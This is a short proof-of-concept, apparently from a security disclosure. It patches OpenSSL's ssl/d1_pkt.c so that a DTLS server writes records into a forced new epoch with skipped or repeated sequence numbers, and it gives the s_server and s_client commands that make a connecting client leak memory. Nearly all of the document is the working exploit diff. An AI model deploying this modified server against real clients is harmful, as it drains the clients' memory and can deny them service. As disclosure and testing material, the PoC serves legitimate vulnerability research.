DTLS mem leak POC code

Run malicious s_server as normal:

openssl s_server -dtls1

Client also connects as normal

openssl s_client -dtls1

Mem leaks will occur in client

diff --git a/ssl/d1_pkt.c b/ssl/d1_pkt.c
index edd17df54b50acb05d68832b261ac3ef5d98b96a..6d542cf4022171ebd532db2d7ede7725c21dd3ea 100644 (file)
--- a/ssl/d1_pkt.c
+++ b/ssl/d1_pkt.c
@@ -1478,6 +1478,9 @@ int do_dtls1_write(SSL *s, int type, const unsigned char *buf, unsigned int len,
        SSL_SESSION *sess;
        int bs;
 
+       /* DTLS mem leak POC code */
+       int force_new_epoch=0;
+
        /* first check if there is a SSL3_BUFFER still being written
         * out.  This will happen with non blocking IO */
        if (s->s3->wbuf.left != 0)
@@ -1626,14 +1629,22 @@ int do_dtls1_write(SSL *s, int type, const unsigned char *buf, unsigned int len,
        (type == SSL3_RT_ALERT && ! SSL_in_init(s))) */
        
        /* there's only one epoch between handshake and app data */
-       
-       s2n(s->d1->w_epoch, pseq);
 
+       /* Any new records we write we are going to force into the next epoch */
+       if(s->s3->write_sequence[7]>=4)
+               force_new_epoch=1;
+
+       s2n(s->d1->w_epoch+force_new_epoch, pseq);
        /* XDTLS: ?? */
 /*     else
        s2n(s->d1->handshake_epoch, pseq); */
 
        memcpy(pseq, &(s->s3->write_sequence[2]), 6);
+       if(force_new_epoch)
+               pseq[5]=4; /* Force same sequence number, new epoch */
+       else if(pseq[5]==3)
+               pseq[5]=4; /* Force a skipped record */
+
        pseq+=6;
        s2n(wr->length,pseq);